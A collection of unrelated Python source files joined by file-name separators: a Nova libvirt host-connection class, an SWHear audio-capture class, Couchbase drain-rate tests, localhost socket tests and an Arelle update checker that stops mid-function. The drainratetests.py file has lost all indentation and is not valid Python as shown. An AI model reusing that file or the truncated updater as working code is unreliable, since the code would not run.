        try:
            LOG.debug("Registering for lifecycle events %s", self)
            wrapped_conn.domainEventRegisterAny(
                None,
                libvirt.VIR_DOMAIN_EVENT_ID_LIFECYCLE,
                self._event_lifecycle_callback,
                self)
        except Exception as e:
            LOG.warn(_LW("URI %(uri)s does not support events: %(error)s"),
                     {'uri': self._uri, 'error': e})

        try:
            LOG.debug("Registering for connection events: %s", str(self))
            wrapped_conn.registerCloseCallback(self._close_callback, None)
        except (TypeError, AttributeError) as e:
            # NOTE: The registerCloseCallback of python-libvirt 1.0.1+
            # is defined with 3 arguments, and the above registerClose-
            # Callback succeeds. However, the one of python-libvirt 1.0.0
            # is defined with 4 arguments and TypeError happens here.
            # Then python-libvirt 0.9 does not define a method register-
            # CloseCallback.
            LOG.debug("The version of python-libvirt does not support "
                      "registerCloseCallback or is too old: %s", e)
        except libvirt.libvirtError as e:
            LOG.warn(_LW("URI %(uri)s does not support connection"
                         " events: %(error)s"),
                     {'uri': self._uri, 'error': e})

        return wrapped_conn

    def _get_connection(self):
        # multiple concurrent connections are protected by _wrapped_conn_lock
        with self._wrapped_conn_lock:
            wrapped_conn = self._wrapped_conn
            if not wrapped_conn or not self._test_connection(wrapped_conn):
                wrapped_conn = self._get_new_connection()

        return wrapped_conn

    def get_connection(self):
        """Returns a connection to the hypervisor

        This method should be used to create and return a well
        configured connection to the hypervisor.

        :returns: a libvirt.virConnect object
        """
        try:
            conn = self._get_connection()
        except libvirt.libvirtError as ex:
            LOG.exception(_LE("Connection to libvirt failed: %s"), ex)
            payload = dict(ip=CONF.my_ip,
                           method='_connect',
                           reason=ex)
            rpc.get_notifier('compute').error(nova_context.get_admin_context(),
                                              'compute.libvirt.error',
                                              payload)
            raise exception.HypervisorUnavailable(host=CONF.host)

        return conn

    @staticmethod
    def _libvirt_error_handler(context, err):
        # Just ignore instead of default outputting to stderr.
        pass

    def initialize(self):
        """Register error handling and start the event subsystem."""
        # NOTE(dkliban): Error handler needs to be registered before libvirt
        #                connection is used for the first time. Otherwise, the
        #                handler does not get registered.
        libvirt.registerErrorHandler(self._libvirt_error_handler, None)
        libvirt.virEventRegisterDefaultImpl()
        self._init_events()
        self._initialized = True

    def _version_check(self, lv_ver=None, hv_ver=None, hv_type=None,
                       op=operator.lt):
        """Check libvirt version, hypervisor version, and hypervisor type

        :param hv_type: hypervisor driver from the top of this file.
        """
        conn = self.get_connection()
        try:
            if lv_ver is not None:
                libvirt_version = conn.getLibVersion()
                if op(libvirt_version,
                      versionutils.convert_version_to_int(lv_ver)):
                    return False

            if hv_ver is not None:
                hypervisor_version = conn.getVersion()
                if op(hypervisor_version,
                      versionutils.convert_version_to_int(hv_ver)):
                    return False

            if hv_type is not None:
                hypervisor_type = conn.getType()
                if hypervisor_type != hv_type:
                    return False

            return True
        except Exception:
            # Any failure to query versions is treated as "check failed".
            return False

    def has_min_version(self, lv_ver=None, hv_ver=None, hv_type=None):
        # True when versions are >= the given minimums and type matches.
        return self._version_check(
            lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.lt)

    def has_version(self, lv_ver=None, hv_ver=None, hv_type=None):
        # True when versions match the given ones exactly.
        return self._version_check(
            lv_ver=lv_ver, hv_ver=hv_ver, hv_type=hv_type, op=operator.ne)

    # TODO(sahid): needs to be private
    def get_domain(self, instance):
        """Retrieve libvirt domain object for an instance.

        :param instance: an nova.objects.Instance object

        Attempt to lookup the libvirt domain objects
        corresponding to the Nova instance, based on
        its name. If not found it will raise an
        exception.InstanceNotFound exception. On other
        errors, it will raise a exception.NovaException
        exception.

        :returns: a libvirt.Domain object
        """
        return self._get_domain_by_name(instance.name)

    def get_guest(self, instance):
        """Retrieve libvirt domain object for an instance.

        :param instance: an nova.objects.Instance object

        :returns: a nova.virt.libvirt.Guest object
        """
        return libvirt_guest.Guest(
            self.get_domain(instance))

    def _get_domain_by_id(self, instance_id):
        """Retrieve libvirt domain object given an instance id.

        All libvirt error handling should be handled in this method and
        relevant nova exceptions should be raised in response.
        """
        try:
            conn = self.get_connection()
            return conn.lookupByID(instance_id)
        except libvirt.libvirtError as ex:
            error_code = ex.get_error_code()
            if error_code == libvirt.VIR_ERR_NO_DOMAIN:
                raise exception.InstanceNotFound(instance_id=instance_id)

            msg = (_("Error from libvirt while looking up %(instance_id)s: "
                     "[Error Code %(error_code)s] %(ex)s")
                   % {'instance_id': instance_id,
                      'error_code': error_code,
                      'ex': ex})
            raise exception.NovaException(msg)

    def _get_domain_by_name(self, instance_name):
        """Retrieve libvirt domain object given an instance name.

        All libvirt error handling should be handled in this method and
        relevant nova exceptions should be raised in response.
        """
        try:
            conn = self.get_connection()
            return conn.lookupByName(instance_name)
        except libvirt.libvirtError as ex:
            error_code = ex.get_error_code()
            if error_code == libvirt.VIR_ERR_NO_DOMAIN:
                raise exception.InstanceNotFound(instance_id=instance_name)

            msg = (_('Error from libvirt while looking up %(instance_name)s: '
                     '[Error Code %(error_code)s] %(ex)s') %
                   {'instance_name': instance_name,
                    'error_code': error_code,
                    'ex': ex})
            raise exception.NovaException(msg)

    def _list_instance_domains_fast(self, only_running=True):
        # The modern (>= 0.9.13) fast way - 1 single API call for all domains
        flags = libvirt.VIR_CONNECT_LIST_DOMAINS_ACTIVE
        if not only_running:
            flags = flags | libvirt.VIR_CONNECT_LIST_DOMAINS_INACTIVE
        return self.get_connection().listAllDomains(flags)

    def _list_instance_domains_slow(self, only_running=True):
        # The legacy (< 0.9.13) slow way - O(n) API call for n domains
        uuids = []
        doms = []
        # Redundant numOfDomains check is for libvirt bz #836647
        if self.get_connection().numOfDomains() > 0:
            for id in self.get_connection().listDomainsID():
                try:
                    dom = self._get_domain_by_id(id)
                    doms.append(dom)
                    uuids.append(dom.UUIDString())
                except exception.InstanceNotFound:
                    # Domain disappeared between listing and lookup.
                    continue

        if only_running:
            return doms

        for name in self.get_connection().listDefinedDomains():
            try:
                dom = self._get_domain_by_name(name)
                if dom.UUIDString() not in uuids:
                    doms.append(dom)
            except exception.InstanceNotFound:
                continue

        return doms

    def list_instance_domains(self, only_running=True, only_guests=True):
        """Get a list of libvirt.Domain objects for nova instances

        :param only_running: True to only return running instances
        :param only_guests: True to filter out any host domain (eg Dom-0)

        Query libvirt to a get a list of all libvirt.Domain objects
        that correspond to nova instances. If the only_running parameter
        is true this list will only include active domains, otherwise
        inactive domains will be included too. If the only_guests parameter
        is true the list will have any "host" domain (aka Xen Domain-0)
        filtered out.

        :returns: list of libvirt.Domain objects
        """

        if not self._skip_list_all_domains:
            try:
                alldoms = self._list_instance_domains_fast(only_running)
            except (libvirt.libvirtError, AttributeError) as ex:
                LOG.info(_LI("Unable to use bulk domain list APIs, "
                             "falling back to slow code path: %(ex)s"),
                         {'ex': ex})
                self._skip_list_all_domains = True

        if self._skip_list_all_domains:
            # Old libvirt, or a libvirt driver which doesn't
            # implement the new API
            alldoms = self._list_instance_domains_slow(only_running)

        doms = []
        for dom in alldoms:
            # ID 0 is the host domain (Xen Dom-0).
            if only_guests and dom.ID() == 0:
                continue
            doms.append(dom)

        return doms

    def get_online_cpus(self):
        """Get the set of CPUs that are online on the host

        Method is only used by NUMA code paths which check on
        libvirt version >= 1.0.4. getCPUMap() was introduced in
        libvirt 1.0.0.

        :returns: set of online CPUs, raises libvirtError on error
        """
        (cpus, cpu_map, online) = self.get_connection().getCPUMap()

        online_cpus = set()
        for cpu in range(cpus):
            if cpu_map[cpu]:
                online_cpus.add(cpu)

        return online_cpus

    def get_capabilities(self):
        """Returns the host capabilities information

        Returns an instance of config.LibvirtConfigCaps representing
        the capabilities of the host.

        Note: The result is cached in the member attribute _caps.

        :returns: a config.LibvirtConfigCaps object
        """
        if not self._caps:
            xmlstr = self.get_connection().getCapabilities()
            LOG.info(_LI("Libvirt host capabilities %s"), xmlstr)
            self._caps = vconfig.LibvirtConfigCaps()
            self._caps.parse_str(xmlstr)
            if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
                try:
                    features = self.get_connection().baselineCPU(
                        [self._caps.host.cpu.to_xml()],
                        libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
                    # FIXME(wangpan): the return value of baselineCPU should be
                    #                 None or xml string, but libvirt has a bug
                    #                 of it from 1.1.2 which is fixed in 1.2.0,
                    #                 this -1 checking should be removed later.
                    if features and features != -1:
                        cpu = vconfig.LibvirtConfigCPU()
                        cpu.parse_str(features)
                        self._caps.host.cpu.features = cpu.features
                except libvirt.libvirtError as ex:
                    error_code = ex.get_error_code()
                    if error_code == libvirt.VIR_ERR_NO_SUPPORT:
                        LOG.warn(_LW("URI %(uri)s does not support full set"
                                     " of host capabilities: %(error)s"),
                                 {'uri': self._uri, 'error': ex})
                    else:
                        raise
        return self._caps

    def get_driver_type(self):
        """Get hypervisor type.

        :returns: hypervisor type (ex. qemu)

        """
        return self.get_connection().getType()

    def get_version(self):
        """Get hypervisor version.

        :returns: hypervisor version (ex. 12003)

        """
        return self.get_connection().getVersion()

    def get_hostname(self):
        """Returns the hostname of the hypervisor."""
        hostname = self.get_connection().getHostname()
        # The first value seen is cached; a later change is only logged
        # because nova requires a restart to pick up the new name.
        if self._hostname is None:
            self._hostname = hostname
        elif hostname != self._hostname:
            LOG.error(_LE('Hostname has changed from %(old)s '
                          'to %(new)s. A restart is required to take effect.'),
                      {'old': self._hostname,
                       'new': hostname})
        return self._hostname

    def find_secret(self, usage_type, usage_id):
        """Find a secret.

        usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
        usage_id: name of resource in secret
        """
        if usage_type == 'iscsi':
            usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_ISCSI
        elif usage_type in ('rbd', 'ceph'):
            usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_CEPH
        elif usage_type == 'volume':
            usage_type_const = libvirt.VIR_SECRET_USAGE_TYPE_VOLUME
        else:
            msg = _("Invalid usage_type: %s")
            raise exception.NovaException(msg % usage_type)

        try:
            conn = self.get_connection()
            return conn.secretLookupByUsage(usage_type_const, usage_id)
        except libvirt.libvirtError as e:
            # NOTE(review): libvirt errors other than VIR_ERR_NO_SECRET
            # fall through and implicitly return None as well -- confirm
            # whether they should be re-raised instead.
            if e.get_error_code() == libvirt.VIR_ERR_NO_SECRET:
                return None

    def create_secret(self, usage_type, usage_id, password=None):
        """Create a secret.

        :param usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
                           'rbd' will be converted to 'ceph'.
        :param usage_id: name of resource in secret
        :param password: optional secret value to set
        """
        secret_conf = vconfig.LibvirtConfigSecret()
        secret_conf.ephemeral = False
        secret_conf.private = False
        secret_conf.usage_id = usage_id
        if usage_type in ('rbd', 'ceph'):
            secret_conf.usage_type = 'ceph'
        elif usage_type == 'iscsi':
            secret_conf.usage_type = 'iscsi'
        elif usage_type == 'volume':
            secret_conf.usage_type = 'volume'
        else:
            msg = _("Invalid usage_type: %s")
            raise exception.NovaException(msg % usage_type)

        xml = secret_conf.to_xml()
        try:
            LOG.debug('Secret XML: %s' % xml)
            conn = self.get_connection()
            secret = conn.secretDefineXML(xml)
            if password is not None:
                secret.setValue(password)
            return secret
        except libvirt.libvirtError:
            with excutils.save_and_reraise_exception():
                LOG.error(_LE('Error defining a secret with XML: %s') % xml)

    def delete_secret(self, usage_type, usage_id):
        """Delete a secret.

        usage_type: one of 'iscsi', 'ceph', 'rbd' or 'volume'
        usage_id: name of resource in secret
        """
        secret = self.find_secret(usage_type, usage_id)
        if secret is not None:
            secret.undefine()

    def _get_hardware_info(self):
        """Returns hardware information about the Node.

        Note that the memory size is reported in MiB instead of KiB.
        """
        return self.get_connection().getInfo()

    def get_cpu_count(self):
        """Returns the total numbers of cpu in the host."""
        return self._get_hardware_info()[2]

    def get_memory_mb_total(self):
        """Get the total memory size(MB) of physical computer.

        :returns: the total amount of memory(MB).
        """
        return self._get_hardware_info()[1]

    def get_memory_mb_used(self):
        """Get the used memory size(MB) of physical computer.

        :returns: the total usage of memory(MB).
        """
        # NOTE(review): on Python 3 sys.platform is 'linux', which this
        # check does not match, so the method would always return 0 --
        # confirm this code targets Python 2 ('linux2'/'linux3') only.
        if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
            return 0

        with open('/proc/meminfo') as fp:
            m = fp.read().split()
        idx1 = m.index('MemFree:')
        idx2 = m.index('Buffers:')
        idx3 = m.index('Cached:')
        if CONF.libvirt.virt_type == 'xen':
            used = 0
            for dom in self.list_instance_domains(only_guests=False):
                try:
                    # TODO(sahid): we should have method list_guests()
                    # which returns Guest's objects
                    guest = libvirt_guest.Guest(dom)
                    # TODO(sahid): Use get_info...
                    dom_mem = int(guest._get_domain_info(self)[2])
                except libvirt.libvirtError as e:
                    LOG.warn(_LW("couldn't obtain the memory from domain:"
                                 " %(uuid)s, exception: %(ex)s") %
                             {"uuid": dom.UUIDString(), "ex": e})
                    continue
                # skip dom0
                if dom.ID() != 0:
                    used += dom_mem
                else:
                    # the mem reported by dom0 is greater than what
                    # it is actually using
                    used += (dom_mem -
                             (int(m[idx1 + 1]) +
                              int(m[idx2 + 1]) +
                              int(m[idx3 + 1])))
            # Convert it to MB
            return used // units.Ki
        else:
            avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
            # Convert it to MB
            return self.get_memory_mb_total() - avail // units.Ki

    def get_cpu_stats(self):
        """Returns the current CPU state of the host with frequency."""
        stats = self.get_connection().getCPUStats(
            libvirt.VIR_NODE_CPU_STATS_ALL_CPUS, 0)
        # getInfo() returns various information about the host node
        # No. 3 is the expected CPU frequency.
        stats["frequency"] = self._get_hardware_info()[3]
        return stats

    def write_instance_config(self, xml):
        """Defines a domain, but does not start it.

        :param xml: XML domain definition of the guest.

        :returns: a virDomain instance
        """
        return self.get_connection().defineXML(xml)

    def device_lookup_by_name(self, name):
        """Lookup a node device by its name.


        :returns: a virNodeDevice instance
        """
        return self.get_connection().nodeDeviceLookupByName(name)

    def list_pci_devices(self, flags=0):
        """Lookup pci devices.

        :returns: a list of virNodeDevice instance
        """
        return self.get_connection().listDevices("pci", flags)

    def compare_cpu(self, xmlDesc, flags=0):
        """Compares the given CPU description with the host CPU."""
        return self.get_connection().compareCPU(xmlDesc, flags)
|
SWHear.py
|
"""
this is a stripped down version of the SWHear class.
It's designed to hold only a single audio sample in memory.
check my github for a more complete version:
http://github.com/swharden
"""
import pyaudio
import time
import numpy as np
import threading
import sys
def getFFT(data, rate):
    """Given some data and rate, returns FFTfreq and FFT (half).

    The samples are Hamming-windowed before transforming, and only the
    non-negative-frequency half of the spectrum (magnitudes) is returned.
    """
    windowed = data * np.hamming(len(data))
    magnitude = np.abs(np.fft.fft(windowed))
    freqs = np.fft.fftfreq(len(magnitude), 1.0 / rate)
    half = len(magnitude) // 2
    return freqs[:half], magnitude[:half]
class SWHear():
    """
    The SWHear class provides access to continuously recorded
    (and mathematically processed) microphone data.

    Arguments:
        device - the number of the sound card input to use. Leave blank
            to automatically detect one.
        rate - sample rate to use. Defaults to something supported.
        updatesPerSecond - how fast to record new data. Note that smaller
            numbers allow more data to be accessed and therefore high
            frequencies to be analyzed if using a FFT later
    """

    def __init__(self, device=None, rate=None, updatesPerSecond=10):
        self.p = pyaudio.PyAudio()
        self.chunk = 2048  # gets replaced automatically in initiate()
        self.updatesPerSecond = updatesPerSecond
        self.chunksRead = 0  # incremented once per recorded chunk
        self.device = device
        self.rate = rate

    ### SYSTEM TESTS

    def valid_low_rate(self, device):
        """Return the lowest supported audio rate for *device* (or None)."""
        for testrate in [25000]:
            if self.valid_test(device, testrate):
                return testrate
        print("SOMETHING'S WRONG! I can't figure out how to use DEV", device)
        return None

    def valid_test(self, device, rate=25000):
        """given a device ID and a rate, return TRUE/False if it's valid."""
        # NOTE(review): ``rate`` is accepted but the probe stream is opened
        # with the device's default sample rate -- confirm this is intended.
        try:
            self.info = self.p.get_device_info_by_index(device)
            if not self.info["maxInputChannels"] > 0:
                return False
            stream = self.p.open(format=pyaudio.paInt16, channels=1,
                                 input_device_index=device,
                                 frames_per_buffer=self.chunk,
                                 rate=int(self.info["defaultSampleRate"]),
                                 input=True)
            stream.close()
            return True
        except Exception:
            # Opening the device failed, so it is not usable for input.
            return False

    def valid_input_devices(self):
        """
        See which devices can be opened for microphone input.
        call this when no PyAudio object is loaded.
        """
        mics = []
        for device in range(self.p.get_device_count()):
            if self.valid_test(device):
                mics.append(device)
        if len(mics) == 0:
            print("no microphone devices found!")
        else:
            print("found %d microphone devices: %s" % (len(mics), mics))
        return mics

    ### SETUP AND SHUTDOWN

    def initiate(self):
        """run this after changing settings (like rate) before recording"""
        if self.device is None:
            self.device = self.valid_input_devices()[0]  # pick the first one
        if self.rate is None:
            self.rate = self.valid_low_rate(self.device)
        # hold 1/updatesPerSecond of a second in memory
        self.chunk = int(self.rate / self.updatesPerSecond)
        if not self.valid_test(self.device, self.rate):
            print("guessing a valid microphone device/rate...")
            self.device = self.valid_input_devices()[0]  # pick the first one
            self.rate = self.valid_low_rate(self.device)
        self.datax = np.arange(self.chunk) / float(self.rate)
        msg = 'recording from "%s" ' % self.info["name"]
        msg += '(device %d) ' % self.device
        msg += 'at %d Hz' % self.rate
        print(msg)

    def close(self):
        """gently detach from things."""
        print(" -- sending stream termination command...")
        self.keepRecording = False  # the threads should self-close
        # BUG FIX: Thread.isAlive() was removed in Python 3.9;
        # is_alive() is the supported spelling.
        while self.t.is_alive():  # wait for all threads to close
            time.sleep(.1)
        self.stream.stop_stream()
        self.p.terminate()

    ### STREAM HANDLING

    def stream_readchunk(self):
        """reads some audio and re-launches itself"""
        try:
            # BUG FIX: np.fromstring is deprecated (removed in modern
            # NumPy) for binary data; np.frombuffer is the replacement.
            self.data = np.frombuffer(self.stream.read(self.chunk),
                                      dtype=np.int16)
            self.fftx, self.fft = getFFT(self.data, self.rate)
        except Exception as E:
            print(" -- exception! terminating...")
            print(E, "\n" * 5)
            self.keepRecording = False
        if self.keepRecording:
            self.stream_thread_new()
        else:
            self.stream.close()
            self.p.terminate()
            print(" -- stream STOPPED")
        self.chunksRead += 1

    def stream_thread_new(self):
        # Launch the next chunk read in a fresh thread.
        self.t = threading.Thread(target=self.stream_readchunk)
        self.t.start()

    def stream_start(self):
        """adds data to self.data until termination signal"""
        self.initiate()
        print(" -- starting stream")
        self.keepRecording = True  # set this to False later to terminate stream
        self.data = None  # will fill up with threaded recording data
        self.fft = None
        self.dataFiltered = None  # same
        self.stream = self.p.open(format=pyaudio.paInt16, channels=1,
                                  rate=self.rate, input=True,
                                  frames_per_buffer=self.chunk)
        self.stream_thread_new()
if __name__=="__main__":
    # Demo: record forever, printing the chunk counter and buffer length
    # each time the background thread delivers a new chunk.
    ear=SWHear(updatesPerSecond=10) # optionally set sample rate here
    ear.stream_start() #goes forever
    lastRead=ear.chunksRead
    while True:
        # Busy-wait (with a short sleep) until a new chunk arrives.
        while lastRead==ear.chunksRead:
            time.sleep(.01)
        print(ear.chunksRead,len(ear.data))
        lastRead=ear.chunksRead
    # NOTE(review): unreachable -- the loop above never exits.
    print("DONE")
|
drainratetests.py
|
import datetime
import time
import unittest
from threading import Thread
import logger
from TestInput import TestInputSingleton
from membase.api.rest_client import RestConnection, RestHelper
from membase.helper.bucket_helper import BucketOperationHelper
from membase.helper.rebalance_helper import RebalanceHelper
from memcached.helper.data_helper import MemcachedClientHelper
from security.rbac_base import RbacBase
class DrainRateTests(unittest.TestCase):
def setUp(self):
self.log = logger.Logger.get_logger()
self.input = TestInputSingleton.input
self.assertTrue(self.input, msg="input parameters missing...")
self.master = self.input.servers[0]
self.bucket = "default"
self.number_of_items = -1
# Add built-in user
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin', self.master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list, RestConnection(self.master), 'builtin')
self._create_default_bucket()
self.drained_in_seconds = -1
self.drained = False
self.reader_shutdown = False
self._log_start()
def tearDown(self):
BucketOperationHelper.delete_all_buckets_or_assert([self.master], self)
rest = RestConnection(self.master)
# Remove rbac user in teardown
role_del = ['cbadminbucket']
temp = RbacBase().remove_user_role(role_del, rest)
self._log_finish()
def _log_start(self):
try:
msg = "{0} : {1} started ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
def _log_finish(self):
try:
msg = "{0} : {1} finished ".format(datetime.datetime.now(), self._testMethodName)
RestConnection(self.servers[0]).log_client_error(msg)
except:
pass
def _create_default_bucket(self, replica=1):
name = "default"
self.bucket_storage = self.input.param("bucket_storage", 'couchstore')
master = self.input.servers[0]
rest = RestConnection(master)
helper = RestHelper(RestConnection(master))
if not helper.bucket_exists(name):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(self.input.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * node_ram_ratio
if(available_ram < 256):
available_ram = 256
rest.create_bucket(bucket=name, ramQuotaMB=int(available_ram),
replicaNumber=replica,
storageBackend=self.bucket_storage)
ready = BucketOperationHelper.wait_for_memcached(master, name)
self.assertTrue(ready, msg="wait_for_memcached failed")
self.assertTrue(helper.bucket_exists(name),
msg="unable to create {0} bucket".format(name))
def _load_data_for_buckets(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
distribution = {128: 1.0}
self.bucket_data = {}
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
self.bucket_data[name] = {}
self.bucket_data[name]["inserted_keys"], self.bucket_data[name]["rejected_keys"] = \
MemcachedClientHelper.load_bucket_and_return_the_keys(name=self.bucket,
servers=[self.master],
value_size_distribution=distribution,
number_of_threads=1,
number_of_items=self.number_of_items,
write_only=True,
moxi=True)
def _parallel_read(self):
rest = RestConnection(self.master)
buckets = rest.get_buckets()
while not self.reader_shutdown:
for bucket in buckets:
name = bucket.name.encode("ascii", "ignore")
mc = MemcachedClientHelper.direct_client(self.master, name)
for key in self.bucket_data[name]["inserted_keys"]:
mc.get(key)
def _monitor_drain_queue(self):
#start whenever drain_queue is > 0
rest = RestConnection(self.master)
start = time.time()
self.log.info("wait 2 seconds for bucket stats are up")
time.sleep(2)
stats = rest.get_bucket_stats(self.bucket)
self.log.info("current ep_queue_size: {0}".format(stats["ep_queue_size"]))
self.drained = RebalanceHelper.wait_for_persistence(self.master, self.bucket, timeout=300)
self.drained_in_seconds = time.time() - start
def _test_drain(self, parallel_read=False):
reader = None
loader = Thread(target=self._load_data_for_buckets)
loader.start()
self.log.info("waiting for loader thread to insert {0} items".format(self.number_of_items))
loader.join()
wait_for_queue = Thread(target=self._monitor_drain_queue)
wait_for_queue.start()
if parallel_read:
reader = Thread(target=self._parallel_read)
reader.start()
self.log.info("waiting for ep_queue == 0")
wait_for_queue.join()
self.log.info("took {0} seconds to drain {1} items".format(self.drained_in_seconds, self.number_of_items))
if parallel_read:
self.reader_shutdown = True
reader.join()
self.assertTrue(self.drained, "failed to drain all items")
def test_drain_10k_items_parallel_read(self):
self.number_of_items = 10 * 1000
self._test_drain(True)
    def test_drain_10k_items(self):
        # Drain 10,000 items with no concurrent read load.
        self.number_of_items = 10 * 1000
        self._test_drain()
    def test_drain_100k_items(self):
        # Drain 100,000 items with no concurrent read load.
        self.number_of_items = 100 * 1000
        self._test_drain()
    def test_drain_100k_items_parallel_read(self):
        # Drain 100,000 items while a background reader fetches them in parallel.
        self.number_of_items = 100 * 1000
        self._test_drain(True)
    def test_drain_1M_items(self):
        # Drain 1,000,000 items with no concurrent read load.
        self.number_of_items = 1 * 1000 * 1000
        self._test_drain()
    def test_drain_1M_items_parallel_read(self):
        # Drain 1,000,000 items while a background reader fetches them in parallel.
        self.number_of_items = 1 * 1000 * 1000
        self._test_drain(True)
|
test_sockets.py
|
# Import third-party packages
# --------------------------------------------------------------
import numpy as np
import sys, os
import pytest
import threading
import socket
import pickle
from datetime import datetime
import subprocess
# Import neighboring packages
# --------------------------------------------------------------
sys.path.append(os.path.dirname(os.path.dirname(
os.path.realpath(__file__))))
from cheby_checker import sockets
# Some tests of general sockets methods
# (tests of cheby-specific sockets classes are below)
# --------------------------------------------------------------
def run_fake_server(HOST = '127.0.0.1', PORT = 65432):
    """Accept exactly one TCP connection on (HOST, PORT), then shut down.

    NB Don't run as-is: launch in a background thread (or similar) so it
    does not block the caller while waiting in accept().
    """
    server_sock = socket.socket()
    server_sock.bind((HOST, PORT))
    server_sock.listen(0)
    # Fix: accept() returns a NEW connection socket which the original
    # discarded without closing, leaking a file descriptor per call.
    conn, _addr = server_sock.accept()
    conn.close()
    server_sock.close()
    # (removed the no-op `assert True`, which verified nothing)
def run_fake_client(HOST = '127.0.0.1', PORT = 65432):
    """Throwaway test client: connect to (HOST, PORT) and immediately disconnect."""
    # The context manager closes the socket on exit, matching the explicit
    # close() of the original.
    with socket.socket() as conn:
        conn.settimeout(1)
        conn.connect((HOST, PORT))
def test_threading_server_and_client(HOST = '127.0.0.1', PORT = 65431):
    ''' Adapted from https://www.devdungeon.com/content/unit-testing-tcp-server-client-python '''
    # Run the fake server in a background thread so the client can reach it.
    background_server = threading.Thread(target=run_fake_server, args=(HOST, PORT))
    background_server.start()
    # Exercise the client's basic connect/disconnect cycle.
    # *** If the above server is not running, then this will not connect ***
    run_fake_client(HOST=HOST, PORT=PORT)
    # Wait for the server thread to finish.
    background_server.join()
# Tests of cheby-specific sockets classes
# --------------------------------------------------------------
#def test_server_instantiation():
# S = sockets.Server()
# assert isinstance(S,sockets.Server)
# C = sockets.Client()
# assert isinstance(C,sockets.Client)
# return True
def test_demo_client_server_connect():
    """Round-trip the default 'Hello World' demo message through a running
    sockets server and check the hard-coded reply content."""
    # launch client
    C = sockets.Client()
    # Send default "Hello World" message
    # & collect returned signal from server
    received = C._demo_client(VERBOSE=True)
    # Check content of demo message
    # is as expected (hard-coded demo content)
    assert isinstance(received, dict)
    # Fix: the original list was missing commas after three elements, so
    # Python's implicit string concatenation silently merged adjacent lines
    # and the rendered error message lost its line breaks. Each sentence is
    # now its own element.
    ERR_STR = "\n".join( [ "*** received = %r " % received,
                           "This is likely to be caused if/when a server is NOT RUNNING.",
                           "A server needs to be launched BEFORE running these tests.",
                           "It is likely that I could do so as part of the test process.",
                           "But I haven't worked out how to do that yet.",
                           " (https://realpython.com/testing-third-party-apis-with-mock-servers/) ",
                           "For now, the simplest way to get a demo server running is to execute the following python command",
                           "python sockets_server_starter_DO_NOT_DELETE.py &",
                           "Then the pytests can be run.",
                           "Try to remember to kill the server afterwards ... "
                           ] )
    assert "msg" in received, ERR_STR
    assert received["msg"] == 'Hello World!'
    assert "received" in received
    assert received["received"] == True
def test_demo_big_message_exchange():
    """Round-trip a large (n x n) numpy array through the demo server and
    check it comes back intact."""
    # launch client
    C = sockets.Client()
    # Build and send a large payload, collecting the echoed reply.
    n = int(3e3)
    payload = { "np" : np.random.random_sample( (n,n) ) }
    received = C._demo_client(data_dict = payload, VERBOSE=True)
    # check that all is as expected
    assert isinstance(received, dict)
    assert "received" in received
    assert received["received"] == True
    assert "np" in received
    assert isinstance( received["np"], np.ndarray )
    assert received["np"].shape == (n,n)
|
Updater.py
|
'''
Created on May 30, 2010
@author: Mark V Systems Limited
(c) Copyright 2011 Mark V Systems Limited, All rights reserved.
'''
import tkinter.messagebox, webbrowser, os, threading
def checkForUpdates(cntlr):
    """Kick off a background update check, unless the web cache is offline.

    cntlr -- the application controller; provides webCache and the UI queue.
    """
    if not cntlr.webCache.workOffline:
        # check for updates in background
        # (removed the redundant local `import threading` — the module is
        #  already imported at file top — and replaced the lambda
        #  default-argument trick with an explicit args tuple)
        thread = threading.Thread(target=backgroundCheckForUpdates, args=(cntlr,))
        thread.daemon = True
        thread.start()
def backgroundCheckForUpdates(cntlr):
    """Fetch the update URL in the background and, if one is found, queue
    checkUpdateUrl to run on the UI thread."""
    actualUrl = None
    cntlr.showStatus(_("Checking for updates to Arelle"))
    try:
        actualUrl = cntlr.webCache.geturl(cntlr.updateURL)
        if actualUrl:
            cntlr.showStatus("") # clear web loading status entry
            cntlr.uiThreadQueue.put((checkUpdateUrl, [cntlr, actualUrl]))
    except Exception:
        # Fix: was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt. Network failure here is best-effort by design.
        cntlr.showStatus("") # clear web loading status entry
def checkUpdateUrl(cntlr, actualUrl):
    """Compare the downloadable version (parsed from the update file name)
    against the running version and prompt the user to download if newer.

    Runs on the UI thread (dialogs are shown with cntlr.parent as parent).
    Returns False if the user cancels; otherwise returns None.
    """
    # get latest header file
    try:
        from arelle import WebCache, Version
        filename = os.path.basename(actualUrl)
        # Update files are named like "...-20YY-MM-DD..."; extract the date.
        if filename and "-20" in filename:
            i = filename.index("-20") + 1
            filenameDate = filename[i:i+10]
            versionDate = Version.version[0:10]
            if filenameDate > versionDate:
                # newer
                reply = tkinter.messagebox.askyesnocancel(
                            _("arelle\u2122 - Updater"),
                            _("Update {0} is available, running version is {1}.  \n\nDownload now?    \n\n(Arelle will exit before installing.)").format(
                                  filenameDate, versionDate),
                            parent=cntlr.parent)
                if reply is None:
                    return False
                if reply:
                    thread = threading.Thread(target=lambda u=actualUrl: backgroundDownload(cntlr, u))
                    thread.daemon = True
                    thread.start()
            else:
                if filenameDate < versionDate:
                    msg = _("Arelle running version, {0}, is newer than the downloadable version, {1}.").format(
                              versionDate, filenameDate)
                else:
                    msg = _("Arelle running version, {0}, is the same as the downloadable version.").format(
                              versionDate)
                tkinter.messagebox.showwarning(_("arelle\u2122 - Updater"), msg, parent=cntlr.parent)
    except Exception:
